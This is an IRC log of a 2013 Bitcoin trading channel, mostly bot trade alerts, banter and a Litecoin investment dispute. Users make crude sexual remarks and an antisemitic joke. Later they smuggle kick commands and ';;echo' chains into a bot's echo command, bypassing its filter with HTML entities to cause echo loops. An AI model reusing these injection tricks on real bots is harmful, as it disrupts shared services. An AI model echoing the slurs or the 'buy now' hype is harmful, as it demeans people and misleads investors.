FORD again Oct 20 11:17:20 Well he's free to disagree with you not selling them for best offer and distributing proceeds, even if he doesn't hold anything. Oct 20 11:17:30 But whatever... Oct 20 11:19:13 who's rockin a tom ford suit? Oct 20 11:21:44 its mentioned in an annoying jay-z song a rapper who has very little talent Oct 20 11:22:37 where has chaang-noi been anyone know? for that matter bowjob too Oct 20 11:23:27 just curious Oct 20 11:28:55 Nope Oct 20 11:38:30 camel face Oct 20 11:44:51 is bitbet.us legal to use in the united states just wondering before I try it out Oct 20 11:51:29 [HAVELOCK] [B] [XBOND] 400 @ 0.00115 = 0.46 BTC [-] Oct 20 12:04:42 [MPEX] [S.MPOE] 2550 @ 0.00088788 = 2.2641 BTC [-] Oct 20 12:08:53 VanCleef: I knew a girl like that..some dude did actually call her camel because..well...she had a camel face. Oct 20 12:09:00 she used to drink a lot too Oct 20 12:09:38 and rocked a nice camel toe? Oct 20 12:09:58 yeah she had a hot bod..but you had to get past that face. Oct 20 12:10:40 she was a 'moped' Oct 20 12:11:03 Mopeds are cool and all but like her, you wouldn't want your friends to see you on one. Oct 20 12:11:17 haha yeh Oct 20 12:11:30 ;;ud moped Oct 20 12:11:31 http://www.urbandictionary.com/define.php?term=moped | A person of the opposite sex who is not attractive, but you would have sex with. Oct 20 12:11:32 Urban Dictionary: moped Oct 20 12:11:38 definate moped Oct 20 12:11:43 interdasting Oct 20 12:13:17 what's a camel face? I see what are horse faces, but not camel faces Oct 20 12:28:41 chicks that look like jayz Oct 20 12:41:52 wow I now have less than 13 ignores, the warning disappeared. I must be doing something wrong Oct 20 12:45:46 ;;ticker Oct 20 12:45:46 MtGox BTCUSD ticker | Best bid: 182.00000, Best ask: 182.48978, Bid-ask spread: 0.48978, Last trade: 182.00000, 24 hour volume: 44746.06780269, 24 hour low: 170.00000, 24 hour high: 195.83267, 24 hour vwap: 183.22873 Oct 20 12:45:57 ;;next Oct 20 12:45:58 See latest update from Onefixt here: https://twitter.com/BitcoinOracle/ Oct 20 12:56:23 http://www.bbc.co.uk/news/science-environment-24571219 ibm going into mining >D Oct 20 12:56:24 BBC News - IBM unveils computer fed by 'electronic blood' Oct 20 12:59:08 pankkake you suck. Oct 20 13:16:55 [MPEX] [S.MPOE] 2850 @ 0.00088917 = 2.5341 BTC [+] Oct 20 13:17:56 [MPEX] [S.MPOE] 2650 @ 0.00089078 = 2.3606 BTC [+] {2} Oct 20 13:20:59 [HAVELOCK] [AM1] 1 @ 0.7002 BTC [-] **** BEGIN LOGGING AT Sun Oct 20 13:36:16 2013 Oct 20 13:41:31 ;;ticker Oct 20 13:41:32 MtGox BTCUSD ticker | Best bid: 179.99000, Best ask: 180.00000, Bid-ask spread: 0.01000, Last trade: 180.00000, 24 hour volume: 38267.13817821, 24 hour low: 170.00000, 24 hour high: 193.00000, 24 hour vwap: 182.64321 Oct 20 13:47:12 [HAVELOCK] [B] [XBOND] 500 @ 0.00114137 = 0.5707 BTC [-] {8} Oct 20 13:51:16 [MPEX] [S.MPOE] 1379 @ 0.00089085 = 1.2285 BTC [+] Oct 20 13:59:35 http://www.zerohedge.com/news/2013-10-19/bitcoin-climbs-highest-april-led-chinese-actions Oct 20 13:59:37 Bitcoin Climbs To Highest Since April, Led By Chinese Actions | Zero Hedge Oct 20 14:02:29 lol "highesrt since april" Oct 20 14:02:33 cause well it was 270 in march Oct 20 14:07:33 [HAVELOCK] [CBTC] 3852 @ 0.00017997 = 0.6932 BTC [+] {2} Oct 20 14:13:39 [MPEX] [S.MPOE] 2100 @ 0.00089085 = 1.8708 BTC [+] Oct 20 14:15:41 [HAVELOCK] [AM100] 14 @ 0.00768898 = 0.1076 BTC [+] Oct 20 14:24:50 [MPEX] [S.MPOE] 3600 @ 0.00088788 = 3.1964 BTC [-] Oct 20 14:42:07 [MPEX] [S.MPOE] 3300 @ 0.00088737 = 2.9283 BTC [-] {2} Oct 20 14:51:16 [MPEX] [S.MPOE] 921 @ 0.00089085 = 0.8205 BTC [+] Oct 20 14:53:18 [MPEX] [S.NSA] 10000 @ 0.0001 = 1 BTC Oct 20 14:54:19 [MPEX] [S.MPOE] 800 @ 0.00089338 = 0.7147 BTC [+] Oct 20 15:00:24 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 20 15:25:50 [MPEX] [S.MPOE] 3400 @ 0.00088472 = 3.008 BTC [-] Oct 20 16:05:19 http://trilema.com/2013/traffic-as-a-proxy-for-interest/ Oct 20 16:05:20 Traffic as a proxy for interest pe Trilema - Un blog de Mircea Popescu. Oct 20 16:06:31 [MPEX] [S.MPOE] 5249 @ 0.00089342 = 4.6896 BTC [+] {2} Oct 20 16:07:31 [MPEX] [S.MPOE] 1651 @ 0.00089392 = 1.4759 BTC [+] Oct 20 16:21:45 [MPEX] [S.NSA] 35000 @ 0.0001 = 3.5 BTC Oct 20 16:31:52 has anyone successfully activated the 2FA with Bitcoin signature on coinbr? Oct 20 16:32:30 good call about China, this is very surprising. your blog would be hard to read to many chinese users too Oct 20 16:33:11 bitesak best ping jurov about that. Oct 20 16:33:35 pankkake i imagine so. it's still a mystery how many of them actually speak english *well enough* to grok wtf i'm on about, Oct 20 16:33:46 alright, thanks Oct 20 16:33:47 as trilema isn't exactly written in beginner friendly english Oct 20 16:37:18 some articles are easy to understand. I understand the oral sex article after a google translate :) Oct 20 16:37:26 so you think :) Oct 20 16:38:01 [HAVELOCK] [CBTC] 6500 @ 0.00017942 = 1.1662 BTC [-] {4} Oct 20 16:39:02 [MPEX] [O] [O.USD.C320N] 11 @ 0.27537297 = 3.0291 BTC [+] Oct 20 16:39:05 http://media.oglaf.com/comic/sensibleshoes.jpg Oct 20 16:39:14 if anyone forgot oglaf, the coolest chick on all the webs. Oct 20 16:40:02 her website is annoying to navigate Oct 20 16:40:37 yeah Oct 20 16:54:17 [MPEX] [S.MPOE] 1660 @ 0.0008903 = 1.4779 BTC [-] Oct 20 17:02:52 http://media.oglaf.com/comic/bugfuck.jpg << provably fair odds. Oct 20 17:33:56 [HAVELOCK] [AM100] 105 @ 0.00700004 = 0.735 BTC [-] {2} Oct 20 17:43:06 [HAVELOCK] [AM100] 88 @ 0.00651899 = 0.5737 BTC [-] Oct 20 18:01:00 http://www.reddit.com/r/BitcoinStocks/comments/1ou57v/cryptoave_investing_in_exchanges/ Oct 20 18:04:19 "Good developer. Have created 3 coins by himself which has got quite a lot of attention." lol Oct 20 18:04:31 changing a few values and creating a logo, skill! Oct 20 18:04:32 herp. Oct 20 18:05:00 here's a real good investment : yet another unknown making shit on the theory "website = busienss", "kid fresh out of school = developer" and so on. Oct 20 18:09:52 pankkake: what are you investing in? Oct 20 18:09:58 where do you put your money? Oct 20 18:10:14 always so skeptical to things you dont know anything about, just open your mouth carelessly Oct 20 18:10:46 I'm putting my money in https://bitcointalk.org/index.php?topic=303653.0 Oct 20 18:11:03 skinnkavaj nah, you're the carelessly dood. Oct 20 18:11:15 pankkake pif le chien ? Oct 20 18:11:19 LOL Oct 20 18:11:26 you have a fund Oct 20 18:11:27 rofl Oct 20 18:11:29 in all seriousness, I do not want to give investment advice Oct 20 18:11:47 mircea_popescu: hehe, I am surprised you know that. it also means "nose" Oct 20 18:11:51 it does, yes. Oct 20 18:12:09 skinnkavaj: no, PIF is a joke Oct 20 18:12:26 we had a joke with friends in the 90s, "pifometru", ie, pif-meter Oct 20 18:12:39 I am not claiming I am the greatest investor ever, as I am not. I did many mistakes especially at first Oct 20 18:12:52 pankkake: You are gonna get so burned Oct 20 18:13:03 Both cryptoave and LTC is going to go up in value Oct 20 18:13:03 the pifomètre, yes :) Oct 20 18:13:09 i will come back in first of dec. Oct 20 18:13:14 and say "i told you so" Oct 20 18:13:15 in your face Oct 20 18:13:57 then bet on http://bitbet.us/bet/525/litecoin-to-fall-below-01-btc-before-2014/?ref=1Eck6cgGzEb9N42CFhcsCBQhZQStoJbHRK and take my money :) Oct 20 18:14:09 No i rather invest direclty in LTC and CryptoAve Oct 20 18:14:17 LTC is gonna turn around Oct 20 18:14:33 anyway, I have no idea if LTC will go up in value, what I know however is that it is now an useless altcoin Oct 20 18:14:33 Do you realize how much exposure LTC has gotten from Piratebay? Oct 20 18:14:35 Or wikileaks? Oct 20 18:14:59 this should be bashed, but im kind of lazy. Oct 20 18:15:05 Its faster than BTC thats why I love it, ofc there are other faster coins.. But none has the momentum that LTC have. Oct 20 18:15:07 both give more exposure to bitcoin anyway Oct 20 18:15:23 "The past performance of PIF is stellar: by not investing in Labcon, IceDrool and InactiveMining, our investors still have 100% of their bitcoins." Oct 20 18:15:28 are you keeping the list up to date ? Oct 20 18:15:29 You can bash FTC all you want Oct 20 18:15:31 The first copy always win Oct 20 18:15:34 LTC is the first copy Oct 20 18:15:41 mircea_popescu: I'm not aware of any new stuff Oct 20 18:15:45 and the Silver to Gold Oct 20 18:15:47 I guess there was PETA mine? Oct 20 18:15:54 LTC is gonna turn around < it will go around when bitcoin falls Oct 20 18:15:56 Right now is the time you BUY all LTC on the market. Oct 20 18:16:02 You dont wait. Oct 20 18:16:02 pankkake i guess skinnkavaj's time is wasted here then ? Oct 20 18:16:35 Ask wikileaks and piratebay why they use LTC Oct 20 18:16:37 silver to gold does not mean anything for digital tokens, they are both pure numbers Oct 20 18:16:47 But its about physocologuy Oct 20 18:16:48 and marketing Oct 20 18:16:51 everything is about marketing Oct 20 18:16:57 Why do you thing such crap that FTC has gotten attention? Oct 20 18:17:08 again, as stated in the forum, I used to hold ltc and use it. now I see nothing to do with it. it's Yet Another Altcoin Oct 20 18:17:34 I am gonna come here and laugh so hard around first of december Oct 20 18:18:08 why? just because of its value? I'm not even discussing that here Oct 20 18:18:16 skinnkavaj, why the compulsive need to convince people you're right ? Oct 20 18:18:32 buy LTC and shut up about it Oct 20 18:18:33 Apocalyptic: https://xkcd.com/386/ Oct 20 18:18:36 tbh i kinda like ltc myself. Oct 20 18:18:41 Apocalyptic: Because pankkake is always opening his mouth about things he does not know anything about Oct 20 18:18:46 of course, i kinda liked it before the curent crop of pushers was invented, Oct 20 18:18:52 it'll be very useful should bitcoin croak. Oct 20 18:18:53 heh pankkake Oct 20 18:18:59 mircea_popescu: you're a litecoin hipster then? Oct 20 18:19:02 nope. Oct 20 18:19:17 Nothing has changed LTC is still destined to go up in value.. Ask the freaks who sold BTC after first crash Oct 20 18:19:17 im just old. which is why it's so funny to see random fuckwits that discovered the world in 2013 opining. Oct 20 18:19:34 I used to like litecoin as an "hedge" but I changed my mind: https://bitcointalk.org/index.php?topic=313331.msg3372691#msg3372691 Oct 20 18:19:41 [HAVELOCK] [DEALCO] 13 @ 0.00948997 = 0.1234 BTC [+] {2} Oct 20 18:20:12 Oh yeah Primecoin much better coin LOL.. What are those primes used for anyway? Lol Oct 20 18:20:35 skinnkavaj: for the love of Me I'm not advocating Primecoin Oct 20 18:22:01 I'm mining it and selling it all, and I can tell you it's overvalued - I think it is because people don't understand how to mine it Oct 20 18:23:04 skinnkavaj: you can also bet on http://bitbet.us/bet/524/litecoin-to-rise-above-04-btc-before-2014/?ref=1Eck6cgGzEb9N42CFhcsCBQhZQStoJbHRK Oct 20 18:23:24 pankkake: I win more by investing the coins directly in LTC Oct 20 18:23:25 So instead Oct 20 18:23:31 im gonna come here and humiluate you Oct 20 18:23:45 [MPEX] [S.MPOE] 1513 @ 0.00089051 = 1.3473 BTC [+] Oct 20 18:24:00 humiliate me about what, exactly? Oct 20 18:24:31 is litecoin going to be less 51% attackable? is it going to be used elsewhere than in btc/ltc exchanges? Oct 20 18:24:32 http://media.oglaf.com/comic/delusionist_1.jpg Oct 20 18:24:37 something like that. Oct 20 18:25:17 then the guy found a job at Apple Oct 20 18:26:00 hahaha Oct 20 18:26:04 !b 4 Oct 20 18:26:06 Last 4 lines bashed and pending review. (http://dpaste.com/1423525/plain/) Oct 20 18:31:39 https://forum.litecoin.net/index.php/topic,6460.msg0.html btct copy coming Oct 20 18:31:40 [ANN] [LITECOININVEST] New litecoin investment platform. www.litecoininvest.com Oct 20 18:31:41 how's litecoin related to silkroad anyway ? wasn't that the bitcoin pill space ? Oct 20 18:31:47 http://ltc.block-explorer.com/charts litecoin difficulty is stagnant Oct 20 18:31:47 Litecoin Charts - Litecoin Cryptocurrency Blockchain Explorer Oct 20 18:31:53 [HAVELOCK] [AM1] 5 @ 0.71062 = 3.5531 BTC [+] {3} Oct 20 18:31:54 dexX7 amusingly enough, btct was actually a ltc exchange Oct 20 18:32:02 i know that Oct 20 18:32:08 before the guy saw nefario bite a girder and figured hey, i can bite girders just as well Oct 20 18:32:08 a ok Oct 20 18:32:14 Atlantis (closed) used to be a litecoin silk road (though they eventually accepted Bitcoin) Oct 20 18:32:14 but i assumed people are more familiar with btct ;) Oct 20 18:32:42 pankkake yeah, that. i don't recall why/how it closed Oct 20 18:32:56 the why is unknown Oct 20 18:33:07 few weeks before silk road Oct 20 18:33:58 ya Oct 20 18:34:05 perhaps not getting the attention it should. Oct 20 18:35:56 I irloled at https://bitcointalk.org/index.php?topic=313872.msg3374203#msg3374203 first quote Oct 20 18:37:16 lol seh's evil Oct 20 18:48:46 so five years ago a 17 year old girl with 34DD tits (truely glorious tits too!) Oct 20 18:48:54 decided to get breast reduction, so she can play tennis better. Oct 20 18:49:12 she just won the moscow tournament. Oct 20 18:49:28 and is now #14 worldwide. Oct 20 18:50:08 http://trilema.com/wp-content/uploads/simona_halep.jpg those were teh tits. Oct 20 18:50:37 RIP Oct 20 19:06:17 hi Oct 20 19:07:11 hi Oct 20 19:07:14 ;;echo hi Oct 20 19:07:14 hi Oct 20 19:08:06 ;;echo hi $randomNick Oct 20 19:08:06 hi arij Oct 20 19:08:19 o noway Oct 20 19:08:29 not as fun as /kick $randomNick Oct 20 19:08:31 $echo /kick $randomnick Oct 20 19:08:37 heh literally. Oct 20 19:08:41 ;;echo /kick $randomnick Oct 20 19:08:41 /kick taub Oct 20 19:08:48 nanotube ^ ? Oct 20 19:08:59 heh Oct 20 19:09:01 I knew a bot that had a russian roulette, either you got banned or oped Oct 20 19:09:07 smartypants bot escapes /! Oct 20 19:09:08 ;;roulette Oct 20 19:09:08 *BANG* Hey, who put a blank in here?! Oct 20 19:09:17 pankkake: fucking genius Oct 20 19:09:23 assbot needs to support this asap Oct 20 19:09:36 make it voice or kickban Oct 20 19:09:56 timed ban then Oct 20 19:10:01 big tits sucks..they get teh sweat and lint underneath them. Oct 20 19:10:02 I wouldn't play for a voice Oct 20 19:10:15 KRS1: we call it UBS Oct 20 19:10:16 good god too big. Oct 20 19:10:23 UBS? Oct 20 19:10:30 under-boob sweat Oct 20 19:10:33 hah Oct 20 19:10:33 ;;roulette Oct 20 19:10:34 *click* Oct 20 19:10:42 ;;roll Oct 20 19:10:43 Error: "roll" is not a valid command. Oct 20 19:10:45 it's like bag sweat, but for women Oct 20 19:11:29 wretched...give me a big overflowing B cup anyday..a little more than a handful..pref. eastern european. Oct 20 19:11:55 KRS1 we had this conversation before. SOME WOMEN WASH Oct 20 19:12:45 well ya know. some men wash their dicks Oct 20 19:12:49 some don't Oct 20 19:14:53 lol Oct 20 19:15:27 how do you know -otc is filled with children, despite having never met them? Oct 20 19:15:38 through deduction, that's how! Oct 20 19:16:02 uhm... -otc is filled with children? Oct 20 19:16:06 <.< Oct 20 19:16:07 >.> Oct 20 19:16:21 what, you thought there were adults in there? :( Oct 20 19:16:38 "selling 0.001 BTC for sgjewgld!" etc Oct 20 19:16:58 why do you disparage skinnkavaj so ? Oct 20 19:17:12 what's sgjewgld? singapor jewish gold? Oct 20 19:17:17 or some kind of pokemon? Oct 20 19:17:24 lol Oct 20 19:17:36 pankkake: it's all bizarre acronyms, figured i could slip that one under the radar Oct 20 19:18:31 http://i.imgur.com/iZt7wjw.png Oct 20 19:19:07 :0 Oct 20 19:20:10 you'd think jews would learn and buy bitcoins after WW2 Oct 20 19:28:41 Namworld hey, you got a pricelist somewhere ? what can you do for a decent quad ? Oct 20 19:34:31 pankkake https://bitcointalk.org/index.php?topic=277241.msg3374571#msg3374571 Oct 20 19:34:37 she's way ahead of you you know :D Oct 20 19:36:16 hi arij Oct 20 19:36:20 hi Oct 20 19:44:04 [MPEX] [S.MPOE] 2877 @ 0.00089093 = 2.5632 BTC [+] {2} Oct 20 19:45:05 [MPEX] [S.MPOE] 573 @ 0.00088842 = 0.5091 BTC [-] Oct 20 19:46:29 roulette won't work unless gribble has ops. Oct 20 19:46:51 but does the echo tjhing work ? Oct 20 19:48:26 it doesn't need to be escaped actually, you don't kick by sending /kick as a message to a channel Oct 20 19:49:44 on my system i do... Oct 20 19:50:03 that's just what your client makes you believe, if i'm not mistaken Oct 20 19:50:18 yes but the client catches it; it doesn't send privmsg #channel /kick, it sends kick #channel nick (or something) Oct 20 19:50:44 mircea_popescu: echo $randomnick, sure it works. didn't you just see it work? Oct 20 19:51:05 the kicking i mean Oct 20 19:51:18 lessseee Oct 20 19:51:30 ;;echo /msg chanserv kick #bitcoin-otc $randomnick Oct 20 19:51:30 /msg chanserv kick #bitcoin-otc Namworld Oct 20 19:51:36 hum Oct 20 19:54:12 ah that, well gribble is too smart to let random people make it kick others :) Oct 20 19:54:22 the / is purely client side Oct 20 19:54:47 also yes, the / stuff is just a command you use to tell your client to send the actual messages. Oct 20 19:54:56 however on some networks you can make it say !kick and the chanserv bots interpret it Oct 20 19:55:12 pankkake: sure, i could tell gribble to kick anyone. because gribble knows me. :P Oct 20 19:55:29 til. Oct 20 19:55:45 /msg chanserv blabla gets translated into PRIVMSG chanserv :blabla Oct 20 19:57:21 sometimes you can also get two bots to get in an enless loop with their echoes Oct 20 19:57:50 that's not hard to do. Oct 20 19:57:57 depending on bot settings, yea :) Oct 20 19:58:12 ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo Oct 20 19:58:12 $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo win Oct 20 19:58:13 $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo ;;echo $echo (1 more message) Oct 20 19:58:19 [MPEX] [S.MPOE] 3600 @ 0.00088842 = 3.1983 BTC [-] Oct 20 19:58:30 no :) Oct 20 19:58:40 would have worked better if mpexbot had echo implemented Oct 20 19:59:24 heh Oct 20 19:59:53 http://headfucking.net/lol.html Oct 20 19:59:53 that's not quite an 'endless' loop though. Oct 20 19:59:53 echo http://headfucking.net/lol.html Oct 20 20:00:16 removing the ;;? :/ Oct 20 20:00:17 amazing amazing amazing amazing amazing assbot Oct 20 20:00:18 AMAZING COMPANY! Oct 20 20:00:45 multiple lines fixed? Oct 20 20:02:23 [HAVELOCK] [AM1] 1 @ 0.759 BTC [+] Oct 20 20:07:03 http://headfucking.net/lol.html Oct 20 20:07:03 ;;echo http://headfucking.net/lol.html Oct 20 20:07:03 http://headfucking.net/lol.html Oct 20 20:07:04 ;;echo http://headfucking.net/lol.html Oct 20 20:07:04 http://headfucking.net/lol.html Oct 20 20:07:05 ;;echo http://headfucking.net/lol.html Oct 20 20:07:05 http://headfucking.net/lol.html Oct 20 20:07:05 ;;echo http://headfucking.net/lol.html Oct 20 20:07:06 http://headfucking.net/lol.html Oct 20 20:07:06 ;;echo http://headfucking.net/lol.html Oct 20 20:07:06 YES Oct 20 20:07:07 http://headfucking.net/lol.html Oct 20 20:07:07 ;;echo http://headfucking.net/lol.html Oct 20 20:07:07 http://headfucking.net/lol.html Oct 20 20:07:08 ;;echo http://headfucking.net/lol.html Oct 20 20:07:08 http://headfucking.net/lol.html Oct 20 20:07:08 ;;echo http://headfucking.net/lol.html Oct 20 20:07:09 http://headfucking.net/lol.html Oct 20 20:07:09 ;;echo http://headfucking.net/lol.html Oct 20 20:07:09 http://headfucking.net/lol.html Oct 20 20:07:10 ;;echo http://headfucking.net/lol.html Oct 20 20:07:10 http://headfucking.net/lol.html Oct 20 20:07:11 ;;echo http://headfucking.net/lol.html Oct 20 20:07:11 http://headfucking.net/lol.html Oct 20 20:07:11 ;;echo http://headfucking.net/lol.html Oct 20 20:07:11 http://headfucking.net/lol.html Oct 20 20:07:12 ;;echo http://headfucking.net/lol.html Oct 20 20:07:12 You've given me 12 commands within the last minute; I'm now ignoring you for 5 minutes. Oct 20 20:07:12 sorry Oct 20 20:07:15 :) Oct 20 20:07:28 the trick was to use ; instead of ; in Oct 20 20:08:19 <dexX7> ;; echo test Oct 20 20:08:20 <gribble> Error: "#59;;" is not a valid command. Oct 20 20:08:40 <dexX7> ah lol Oct 20 20:08:41 <dexX7> i see Oct 20 20:08:46 <dexX7> neat :) Oct 20 20:09:07 <pankkake> but the banning of ;; should occur after decoding the html entities, so there's something weird going on Oct 20 20:10:19 <dexX7> yup Oct 20 20:17:45 <nanotube> heh Oct 20 20:21:42 <assbot> [HAVELOCK] [HIM] 3 @ 0.07979999 = 0.2394 BTC [+] Oct 20 20:25:57 <nubbins`> funny thing about the word "should" :D Oct 20 20:26:47 <assbot> [HAVELOCK] [HIM] 7 @ 0.07979999 = 0.5586 BTC [+] Oct 20 20:27:36 <nubbins`> funny thing about HIM having a market cap of 0.5M too Oct 20 20:27:41 <mircea_popescu> kay so s.nsa ipo is closed. total authorised shares 4`737`075. i'll make a post about it tomorrow for recordkeeping. Oct 20 20:28:09 <nubbins`> congrats Oct 20 20:35:16 <mircea_popescu> yee Oct 20 20:38:38 <pizzaman1337> aw darn, I missed the IPO Oct 20 20:38:46 <Kleeck_> what ipo? Oct 20 20:38:52 <pizzaman1337> http://mpex.co/?mpsic=S.NSA Oct 20 20:38:55 <Kleeck_> oh. Oct 20 20:40:28 <mircea_popescu> it was on for like five days... Oct 20 20:40:44 <pizzaman1337> yeah :P I've been out of the loop Oct 20 20:40:50 <pizzaman1337> it's all good Oct 20 20:43:03 <assbot> [HAVELOCK] [CFIG] 1 @ 0.144 BTC [+] **** BEGIN LOGGING AT Mon Oct 21 00:38:37 2013 Oct 21 00:43:59 <assbot> [HAVELOCK] [NEOBEE] 70 @ 0.00273998 = 0.1918 BTC [-] Oct 21 01:09:24 <assbot> [HAVELOCK] [B] [XBOND] 250 @ 0.00117 = 0.2925 BTC [-] Oct 21 01:11:26 <assbot> [HAVELOCK] [VTX] 1 @ 0.40979999 BTC [+] Oct 21 01:15:36 <mircea_popescu> o hey guise! remember Oct 21 01:15:37 <mircea_popescu> https://bitcointalk.org/index.php?topic=176077 Oct 21 01:15:38 <ozbot> Ripple or Bitcoin Oct 21 01:15:58 <dexX7> what is this? necro hour? Oct 21 01:16:18 <mircea_popescu> dude im just totally bummed out that bitcoin lost Oct 21 01:16:22 <dexX7> digging out the old am comparison.. shame on you Oct 21 01:16:35 <mircea_popescu> because all of the people who said ripple rocks on a forum Oct 21 01:16:40 <mircea_popescu> hm ? Oct 21 01:17:01 <dexX7> https://bitcointalk.org/index.php?topic=151265.msg3376435#msg3376435 Oct 21 01:17:03 <ozbot> Furthering the S.DICE / AM comparison Oct 21 01:18:01 <mircea_popescu> awww hahaha Oct 21 01:18:05 <mircea_popescu> i didn't do that lol. Oct 21 01:18:33 <dexX7> haha yea, but maybe you instructed her ;) Oct 21 01:19:41 <mircea_popescu> sometimes i do but not this time Oct 21 01:19:45 <mircea_popescu> was a good chuckle anyway. Oct 21 01:20:00 <mircea_popescu> (the oglaf comic was per my instructions for instance hehe) Oct 21 01:20:37 <dexX7> the one with the ship and lack of real knowledge was awesome Oct 21 01:21:54 <mircea_popescu> yeah that one. Oct 21 01:23:13 <dexX7> i don't think so? Oct 21 01:23:37 <dexX7> or let's say never heard anything bad about him besides trolling Oct 21 01:24:46 <dexX7> report you at the bitcoin police? Oct 21 01:27:04 <dexX7> wasn't there already drama about keeping the am shares? Oct 21 01:36:54 <pankkake> Diablo-D3: well, grow some balls and become an outlaw Oct 21 01:40:55 <assbot> [HAVELOCK] [AM100] 23 @ 0.00749 = 0.1723 BTC [+] Oct 21 02:27:41 <assbot> [HAVELOCK] [AM100] 15 @ 0.00749 = 0.1124 BTC [+] Oct 21 02:30:49 <mircea_popescu> ;;ticker Oct 21 02:30:49 <gribble> MtGox BTCUSD ticker | Best bid: 184.50082, Best ask: 184.73998, Bid-ask spread: 0.23916, Last trade: 184.74000, 24 hour volume: 11282.63857969, 24 hour low: 177.25000, 24 hour high: 186.12000, 24 hour vwap: 182.83954 Oct 21 02:30:50 <assbot> 123! Oct 21 02:41:39 <MTBmanTT> yawn Oct 21 02:48:25 <skinnkavaj> Lol Oct 21 02:48:26 <skinnkavaj> pankkake Oct 21 02:48:32 <skinnkavaj> Making fun of himself in a Litecoin is dead thread Oct 21 02:48:41 <skinnkavaj> https://bitcointalk.org/index.php?topic=314238.60 Oct 21 02:48:43 <ozbot> litecoin dead ? Oct 21 02:49:06 <pankkake> ozbot: yes Oct 21 02:51:20 <skinnkavaj> ozbot: Lol. Look at all altcoins, litecoin is the number 1 in acceptance overall. Piratebay and Wikileaks use it. Founder of it works in Coinbase. Mtgox is around the corner. It's the first scrypt coin with no premine (NVC). It has the marketing effect "Silver to Gold". Oct 21 02:51:32 <pankkake> ozbot is a bot :/ Oct 21 02:51:53 <skinnkavaj> Who cares Oct 21 02:51:56 <nubbins`> hahaha Oct 21 02:51:58 <mircea_popescu> !b 4 Oct 21 02:51:59 <assbot> Last 4 lines bashed and pending review. (http://dpaste.com/1423924/plain/) Oct 21 02:52:02 <nubbins`> http://www.google.ca Oct 21 02:52:03 <ozbot> Google Oct 21 02:52:04 <pankkake> did you buy litecoins earlier, or are just buying now? Oct 21 02:52:15 <pankkake> I hope for you it's the latter Oct 21 02:52:51 <pigeons> its not the first scrypt coin with no premine, that was fairbrix, and coblee started litecoin cause fairbrix got 51%ed too many times Oct 21 02:53:16 <skinnkavaj> pigeons: Yes and it survived and is the second biggest network on the internet Oct 21 02:53:42 <skinnkavaj> If there is any altcoin that is going to succeed, it is LTC Oct 21 02:53:47 <pigeons> add an adjective to second bigges ___ network on the internet Oct 21 02:54:01 <pigeons> just tryin to keep it real Oct 21 02:54:07 <nubbins`> second biggest goddamn network? Oct 21 02:54:12 <pankkake> "If there is any altcoin that is going to succeed, it is LTC" this is endlessly repeated with no basis at all Oct 21 02:54:30 <pigeons> second biggest hashcash network on the internet Oct 21 02:54:39 <skinnkavaj> pankkake: No its based on that it has the most acceptance and the best marketing phrase of all. Oct 21 02:54:53 <nubbins`> best marketing phrase! Oct 21 02:55:01 <skinnkavaj> Sell me XPM Oct 21 02:55:01 <pigeons> litecoin is the new black Oct 21 02:55:06 <skinnkavaj> Its enviroement friendly Oct 21 02:55:10 <skinnkavaj> Hahahha Oct 21 02:55:13 <skinnkavaj> Sell me LTC Oct 21 02:55:15 <skinnkavaj> its SILVER Oct 21 02:55:19 <pankkake> well, be *very* careful with that silver to gold. when silver got demonetized, it lost a lot of its value Oct 21 02:55:39 <pankkake> kinda like my point of litecoin being just another altcoin ;) Oct 21 02:55:57 <skinnkavaj> I don't even understand your point Oct 21 02:56:01 <skinnkavaj> It is based on NOTHING Oct 21 02:56:09 <pigeons> just like litecoin Oct 21 02:56:44 <skinnkavaj> Think of BTC like Coca Cola and think of LTC like Pepsi Oct 21 02:57:02 <nubbins`> i don't like soft drinks Oct 21 02:57:03 <asciilifeform> more of an Inca Cola. Oct 21 02:57:10 <pankkake> but it isn't, both are digital tokens Oct 21 02:57:11 <assbot> [HAVELOCK] [AM100] 85 @ 0.00708235 = 0.602 BTC [-] {3} Oct 21 02:57:32 <nubbins`> asciilifeform: ltc is popular in peru? Oct 21 02:57:52 <pankkake> coming back to silver and gold: both were used as monetary backing, but silver lost that privilege; silver lost a lot of value Oct 21 02:58:38 <asciilifeform> nubbins`: incacola is a cheapo soda sold in the u.s. Oct 21 02:58:50 <skinnkavaj> Yeah I bet silver lost in USD value in the long run Oct 21 02:58:58 <skinnkavaj> So retarded Oct 21 02:58:59 <nubbins`> asciilifeform: its also the national drink of peru Oct 21 02:59:07 <nubbins`> not really. but it's EVERYWHERE Oct 21 02:59:16 <pankkake> still, there are reasons for these metals to be sold because of their industrial use; while digital tokens are digital tokens Oct 21 02:59:39 <skinnkavaj> pankkake: Do you believe any altcoin is going to succeed? Oct 21 02:59:52 <skinnkavaj> Yes or No Oct 21 02:59:56 <pankkake> probably not Oct 21 03:00:03 <skinnkavaj> Lol Oct 21 03:00:06 <skinnkavaj> I am out Oct 21 03:00:16 <pankkake> it would have to be something truly unfixable in Bitcoin Oct 21 03:00:26 <pankkake> or a wholly different codebase at least Oct 21 03:02:32 <pankkake> I do follow some altcoin development - even donated to some ;) Oct 21 03:04:29 <mircea_popescu> <pigeons> its not the first scrypt coin with no premine, that was fairbrix, and coblee started litecoin cause fairbrix got 51%ed too many times << few know this Oct 21 03:04:54 <pankkake> 